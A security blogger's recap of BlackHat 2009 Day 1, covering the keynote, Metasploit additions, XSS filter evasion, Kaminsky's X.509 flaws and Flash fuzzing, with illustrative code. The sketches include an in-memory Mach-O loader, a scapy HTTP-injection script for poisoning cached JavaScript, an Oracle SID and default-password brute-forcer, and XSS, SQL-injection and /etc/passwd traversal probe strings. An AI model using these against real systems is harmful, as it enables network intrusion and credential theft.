
BlackHat 2009, Day 1

Tags: security

The annual Vegas security conference is upon us again, and there have been plenty of interesting presentations. Last year, it felt like WiFi was the “theme” of the year — this year, the most interesting (and best-attended) briefings were on SSL and mobile devices.

The Wednesday keynote was presented by Douglas Merrill, the COO of EMI Records, formerly of Google, RAND Corporation, and several other places. He spoke on a popular topic for security conference keynotes — risk assessment and innovation. 80% of CEOs believe they’ve had a data breach, even though the statistics show that it’s basically impossible for the actual rate to be that high. And most of the breaches that do happen are trivial — looking at Privacy Watch’s statistics, 16% are lost laptops, 11% are paper that’s thrown away, etc. Actual hacker activity accounts for only a small percentage of the breaches — certainly not enough to justify what we spend on security. We constantly try as an industry to come up with “security ROI” metrics to show execs, but most of them are just nonsense; we make up numbers, then multiply them by numbers we also made up, and that’s how much you saved in the security breaches that didn’t happen but might have.

The #1 driver of security for CEOs is BCP (business continuity planning) — they just want to make sure things keep running no matter what. For security people, the #1 driver tends to be compliance — because it’s a stick with which we can make executives spend money even when they don’t want to. Due to the huge downside of a breach for us (since our job is preventing them, having one happen looks really bad), we overinvest in prevention.

Merrill’s point was that this overinvestment in security can stifle innovation, especially when perimeters (my favorite thing to hate, I know) are involved. People use consumer tools because the enterprise tools restrict them too much. Giving people control of their machines promotes innovation, and companies where people are free to innovate are more profitable — but giving people control makes endpoint security impossible, and reduces control by security and IT. We risk our jobs by doing the right thing for the company, and so we continue to do the “safe” thing even when it doesn’t make sense. Overall, it was a pretty good keynote — nothing revolutionary in it, but certainly food for thought for an audience of security professionals.

The second talk I attended was actually three “mini-talks” about new Metasploit functionality, presented by Dino Dai Zovi, Mike Kershaw, and Chris Gates.

Dai Zovi adapted Meterpreter for the Mac. He created a Mach-O function resolver, and found one in the OS that wasn’t covered by the library randomization. His payload injects a remote execution loop, creates a bundle in RAM, then loads and executes it (neat trick, very hard to do in Windows but apparently easy on a Mac.) This can be used to load either Dai Zovi’s CocoaSequenceGrabber payload (which forces the webcam to take photos and send them to the hacker), or Macterpreter, a Meterpreter port by Charlie Miller. Pretty much all of Meterpreter works except process migration (processes owned by the same user can’t write to each other on Macs), so it should be good for all your Mac-hacking needs. He’s also added 4 exploits from the Mac Hacker’s Handbook to Metasploit.
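
To give a flavor of why in-memory loading is easy on the Mac: the (deprecated, but long-present) dyld APIs will link and run a Mach-O bundle straight from a byte buffer. Here's a rough sketch of just that step, done in Python via ctypes for readability; the payload.bundle file and its exported run() function are hypothetical, and Dai Zovi's payload of course does this from injected native code rather than Python:

```python
import ctypes

dyld = ctypes.CDLL(None)   # the dyld NS* functions are visible in every Mac process

dyld.NSCreateObjectFileImageFromMemory.argtypes = [
    ctypes.c_char_p, ctypes.c_size_t, ctypes.POINTER(ctypes.c_void_p)]
dyld.NSLinkModule.argtypes = [ctypes.c_void_p, ctypes.c_char_p, ctypes.c_uint32]
dyld.NSLinkModule.restype = ctypes.c_void_p
dyld.NSLookupSymbolInModule.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
dyld.NSLookupSymbolInModule.restype = ctypes.c_void_p
dyld.NSAddressOfSymbol.argtypes = [ctypes.c_void_p]
dyld.NSAddressOfSymbol.restype = ctypes.c_void_p

buf = open("payload.bundle", "rb").read()          # an MH_BUNDLE Mach-O image

img = ctypes.c_void_p()
ok = dyld.NSCreateObjectFileImageFromMemory(buf, len(buf), ctypes.byref(img))
assert ok == 1                                     # NSObjectFileImageSuccess

mod = dyld.NSLinkModule(img, b"payload", 0x3)      # BINDNOW | PRIVATE
sym = dyld.NSLookupSymbolInModule(mod, b"_run")    # C symbols get a leading "_"
ctypes.CFUNCTYPE(None)(dyld.NSAddressOfSymbol(sym))()
```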

Kershaw sought to adapt all the old shared-media attacks (i.e. what we did in the ’80s and ’90s on hub-based Ethernet) to WiFi. His LORCON2 library translates between 802.11 (WiFi) and 802.3 (Ethernet), so you can spoof ARP, DNS, even TCP connections. This gives you the airpwn attack in Metasploit — you can spoof, say, urchin.js or other common embedded JS files, give them a cache lifetime of a decade, and have someone’s browser calling home for a good long time even when they move off the unsafe network. Open and WEP networks literally can’t be secured against this, since you can spoof the AP to the client (so no AP-based defenses can be effective — the AP doesn’t even see the attack.) If you have the key, you can even do this on WPA-PSK (by forcing deauths and spoofing the AP.)
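
To make the spoofing concrete: winning the race just means answering a victim's HTTP request before the real server does, with cache headers that make the poison stick. Here's a rough sketch of that logic in Python with scapy (the real attack speaks 802.11 through LORCON2; the interface name and injected script here are stand-ins):

```python
from scapy.all import Ether, IP, Raw, TCP, sendp, sniff

IFACE = "wlan0"   # assumed injection-capable interface

# A forged response with a ten-year cache lifetime, so the browser keeps
# re-running our script long after the victim leaves the hostile network.
BODY = b"/* attacker JavaScript goes here */"
RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/javascript\r\n"
    b"Cache-Control: max-age=315360000\r\n"        # ~10 years: the whole point
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n\r\n" + BODY
)

def inject(pkt):
    # Race the real server whenever a victim requests the target script.
    if Raw in pkt and pkt[Raw].load.startswith(b"GET /urchin.js"):
        req = pkt[TCP]
        forged = (
            Ether(src=pkt[Ether].dst, dst=pkt[Ether].src)
            / IP(src=pkt[IP].dst, dst=pkt[IP].src)
            / TCP(sport=req.dport, dport=req.sport, flags="PA",
                  seq=req.ack, ack=req.seq + len(pkt[Raw].load))
            / Raw(RESPONSE)
        )
        sendp(forged, iface=IFACE, verbose=False)

sniff(iface=IFACE, filter="tcp port 80", prn=inject, store=0)
```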

Gates essentially ported every Oracle attack of the last 10 years to Metasploit (all 11 of ’em.) Since Oracle charges for updates, there are tons of vulnerable servers out there (albeit not usually on the Internet.) There’s a TNS mixin, and an Oracle DB access plugin that executes queries via Oracle Instant Client (on Linux and Mac OS only, though Chris offered a reward to anyone who would port it to Windows this weekend.) It can grab the SID from the server on Oracle 9, or brute-force it on Oracle 10 (or sometimes grab it, depending on what Oracle modules are loaded.) All of these exploits were old, but they’re now really easy to perform.
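
As a sketch of how the SID brute-forcing works (this is illustrative Python using the cx_Oracle client, not Gates's actual module; the host, port, and wordlist are made up), the listener's error codes tell you whether a guessed SID exists:

```python
import cx_Oracle

HOST, PORT = "10.0.0.5", 1521                        # assumed target listener
CANDIDATES = ["ORCL", "XE", "PROD", "DEV", "TEST"]   # toy wordlist

for sid in CANDIDATES:
    dsn = cx_Oracle.makedsn(HOST, PORT, sid)
    try:
        cx_Oracle.connect("scott", "tiger", dsn)
        print(sid, "- valid SID, and the default account works!")
    except cx_Oracle.DatabaseError as exc:
        msg = str(exc)
        # ORA-12505: the listener has never heard of this SID; keep guessing.
        # Anything else (e.g. ORA-01017, bad username/password) means the
        # listener accepted the SID and routed us to a real instance.
        if "ORA-12505" not in msg:
            print(sid, "- SID exists:", msg.splitlines()[0])
```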

David Lindsay and Eduardo Vela gave a talk on bypassing XSS filters. They weren’t looking at escaping/sanitizing functions, but rather at HTTP IDSes and other external anti-XSS measures.

They went through a long list of HTML tricks that can be used to evade these filters: omitting whitespace, using / for spaces (did you know <img/src="file.gif"alt="text"> — no spaces — is treated as valid HTML by most browsers?), roundabout parameters (using separate <param> tags for everything even when you don’t have to), using data= rather than src= in tags that support it, embedding JavaScript in weird tags like <isindex>, prepending useless namespaces on tags (e.g. <x:script xmlns:x=…>), using alternate syntax (why say "document.cookie" when "document['cookie']" or "with(document)alert(cookie)" will do), etc.

They even went into truly strange things, like using the ternary operator to make strings that were valid as both HTML and JavaScript but had different meanings in each, or using deprecated or broken syntaxes (which tend to be browser-specific.) Adding multiple parameters with the same name has undefined behavior, but works in some browsers. With Unicode, you can pad small (one-byte) characters out into overlong multi-byte encodings, which shouldn’t be accepted but are by some Unicode implementations (including Java’s and PHP’s.)

Perhaps most interestingly, filters could often be bypassed by ridiculously simple measures — such as using prompt() instead of alert() when testing for XSS, using ' or '2'='2 instead of ' or '1'='1 to test for SQL injection, or requesting /etc/x/../passwd instead of /etc/passwd. Some badly implemented filters just look for specific attacks, not general patterns.
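
A toy probe loop makes the point; this is illustrative Python with requests against a hypothetical endpoint. Each pair of payloads is semantically identical, so a filter that blocks one but passes the other is matching signatures, not patterns:

```python
import requests

TARGET = "http://testsite.example/search?q="   # hypothetical endpoint

VARIANTS = [
    "<script>alert(1)</script>",    # canonical probe, usually signatured
    "<script>prompt(1)</script>",   # same effect, different signature
    "' or '1'='1",                  # canonical SQLi test
    "' or '2'='2",                  # logically identical, often missed
    "/etc/passwd",                  # canonical traversal target
    "/etc/x/../passwd",             # same file, different string
]

for payload in VARIANTS:
    r = requests.get(TARGET + requests.utils.quote(payload))
    blocked = r.status_code in (403, 406) or "blocked" in r.text.lower()
    print("BLOCKED" if blocked else "passed ", repr(payload))
```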

Dan Kaminsky had managed to keep his talk secret this year, so we went into it knowing nothing but that it was “something about network security.” His talk was entitled “Black Ops of PKI,” and covered some vulnerabilities involving X.509 certificates (a theme I’ll revisit a lot when I do my DefCon writeup.) 60% of data breaches are not due to vulnerabilities, but just bad password handling — and PKI, based on X.509 certs, was supposed to fix all that. Of course, what’s actually been implemented is not really what most of us mean by PKI — the universal directory of distinguished names was never built — but certificates are everywhere now.

For those of you not familiar with them, X.509 certs are the basis of SSL/TLS and many other encrypted protocols. A certificate is supposed to indicate that the entity presenting it really is the entity named in the certificate. Certificates are signed by various Certificate Authorities, which themselves have certificates signed by other authorities, chaining all the way up to the Root CAs, whose certificates are just built into your browser & other software. As long as you trust the root CAs to validate other CAs, and trust those CAs to only sign legitimate certs, the system should work. But… that’s a lot of trust.
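
You can watch that delegation in action from any client. A quick Python sketch (using the standard ssl module and the cryptography package; the host is arbitrary) pulls a server's leaf certificate and shows who vouches for it:

```python
import ssl
from cryptography import x509

pem = ssl.get_server_certificate(("www.example.com", 443))
cert = x509.load_pem_x509_certificate(pem.encode())
print("subject:", cert.subject.rfc4514_string())
print("issuer: ", cert.issuer.rfc4514_string())
# The issuer's own certificate is signed by the next CA up, and so on,
# until you reach a self-signed root shipped with your browser or OS.
```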

The problem is, X.509 can’t exclude — every CA can issue certs for every name. It’s too hard to interoperate with private CAs, so companies promise to behave and root CAs like VeriSign give them a signed intermediate certificate, allowing them to give out valid certs for anyone. What’s more, these certificates depend on various hashing algorithms for their security (since the hashes are what gets signed.) RapidSSL used MD5 for its signatures, and last year some security researchers took advantage of known issues in MD5 to create their own intermediate cert that was “signed” by RapidSSL’s signature. Luckily, that group had no intent to abuse the cert, so RapidSSL moved to a better hash and all was well.

Kaminsky discovered that one of VeriSign’s own root certs is self-signed with MD2. There’s not even any good reason to self-sign a root cert, but they always do (because people — and programs — just expect a cert to be signed.) MD2, like MD5, has known vulnerabilities — it’s subject to a preimage attack that will eventually let someone create their own root cert that VeriSign’s self-signature validates. The complexity of this attack is outside our capabilities right now (around 2^73 operations), but won’t be for much longer. VeriSign has replaced this certificate (with one signed using SHA-1), but it will probably be a long time before every client drops the old one from its trust list.
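
Spotting such certs is mechanical once you know to look, since the signature algorithm is recorded in the certificate itself. Here's a sketch that flags MD2/MD4/MD5-signed certs in a PEM bundle (the file path is assumed; requires a recent version of the cryptography package):

```python
from cryptography import x509

# PKCS#1 signature-algorithm OIDs built on broken hashes.
WEAK = {
    "1.2.840.113549.1.1.2": "md2WithRSAEncryption",
    "1.2.840.113549.1.1.3": "md4WithRSAEncryption",
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
}

for cert in x509.load_pem_x509_certificates(open("roots.pem", "rb").read()):
    oid = cert.signature_algorithm_oid.dotted_string
    if oid in WEAK:
        print(WEAK[oid], "-", cert.subject.rfc4514_string())
```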

Much more interesting, though, were attacks on CAs themselves via PKCS#10 (the format in which you request a certificate to be issued to you.) When you request a certificate, you provide a “distinguished name”, part of which is the “common name” (the domain name, in the case of SSL certs), as a specially formatted string (length-prefixed, not null-terminated) inside a binary package. Originally, requesting a cert was a manual process with lots of in-depth verification, but now it’s all automated. Kaminsky asked… what happens if you have multiple common names in one distinguished name? (Undefined; different CAs and clients do different things.) The identifier for common name is the OID 2.5.4.3… what if you provide 2.5.4.03? Is that the same? The strange binary encoding means it may be, and 2.5.4.2^64+3 (overflowing a 64-bit integer back to 3) might be, too. What if there’s a null in the name? Since the format uses Pascal strings (length-prefixed) rather than C strings (null-terminated), nulls in the name are valid — but practically every SSL client there is blows up on them.
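
The null trick is easy to visualize with byte strings. The CA treats the common name as length-prefixed data and sees the whole thing, so it validates the attacker's domain at the end; a C-string-based client stops reading at the null and sees the victim's. The names below are made up:

```python
# A common name an attacker might submit in a PKCS#10 request.
cn = b"www.bank.example\x00.attacker.example"

# The CA reads it Pascal-style (length-prefixed): all 34 bytes. It checks
# that the requester controls attacker.example, and signs.
print(cn)                          # b'www.bank.example\x00.attacker.example'

# A C-string-based SSL client stops at the first null when comparing the
# certificate against the hostname, so the cert "matches" the bank.
print(cn.split(b"\x00", 1)[0])     # b'www.bank.example'
```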

And that was about it. Kaminsky ended with a recommendation that we embrace DNSSEC, so we can put certificate hashes in DNS. Unlike X.509, DNSSEC can exclude — we can ensure that only the authorized owner of a domain can provide its certificate, as well as make it possible for domains with EV certificates to exclude normal certificates for that domain. After what Dan presented the previous two years, this one seemed kind of disappointing — an MD2 cert and some parsing flaws in CAs? That’s it?

Actually, it turns out that these are devastating, and essentially render SSL unable to protect communications on untrusted networks (you know, precisely the places where you want SSL to protect you.) Smart hackers will be picking up wildcard certificates while they can, as CAs will be scrambling to fix this. As to why, I’ll explain that during my DefCon Day 1 writeup — Moxie Marlinspike and Mike Zusman presented research (apparently done at the same time as Kaminsky’s) that actually exploits this stuff.

The last presentation I went to on Day 1 was Riley Hassell’s talk on “Exploiting Rich Content.” The description made this sound like it was about attacking web sites that use rich content (e.g. Flash, Java, Media Player, QuickTime, etc.), but it was actually about attacking the content engines themselves (e.g. making Flash malware), which, to me, is a much less interesting space. But then, my job is protecting web sites & services from attack, not being Adobe.

Hassell demonstrated how, using a fault-injection fuzzer called FlashFire, he found 23 vulnerabilities across 785 codepaths in Flash, most of them read-beyond-bounds issues. Normally those aren’t considered terribly serious, but since Flash runs in a browser, they can be: it’s possible to write a Flash component on one web page that steals all the information in your browser’s memory space. If you have your bank’s website open in another tab, that could obviously be a bad thing. And it’s quite the scalable bug, considering that Flash is installed on 99% of browsers and the bug works on all platforms.
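
FlashFire itself wasn't released, but the fault-injection idea is straightforward: corrupt a few bytes of a valid file, hand it to the player, and watch for crashes. A generic sketch of that loop in Python (the sample file and standalone player path are assumptions; real fuzzers add coverage tracking and crash triage on top):

```python
import random
import subprocess

TEMPLATE = open("sample.swf", "rb").read()   # a known-good SWF (assumed)
PLAYER = "./flashplayer"                     # standalone player binary (assumed)

for i in range(1000):
    data = bytearray(TEMPLATE)
    for _ in range(random.randint(1, 8)):    # corrupt a few random bytes
        data[random.randrange(len(data))] = random.randrange(256)
    with open("fuzz.swf", "wb") as f:
        f.write(data)
    try:
        proc = subprocess.run([PLAYER, "fuzz.swf"],
                              capture_output=True, timeout=5)
        if proc.returncode < 0:              # killed by a signal: likely a crash
            print(f"case {i}: signal {-proc.returncode}")
            with open(f"crash-{i}.swf", "wb") as f:
                f.write(data)
    except subprocess.TimeoutExpired:
        pass                                 # hang or still rendering; move on
```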

And that was it for Day 1. I went to an IOActive reception at Spago, met some interesting people (most of them from IOActive), and called it a night — most of the BlackHat nightlife seems to happen on Day 2. I’ll update this post with links to the presentation decks and/or videos when they become available online (decks will probably be up relatively soon, but BlackHat doesn’t usually post videos until months after the conference, since they’re sold for a pretty hefty fee at first.)


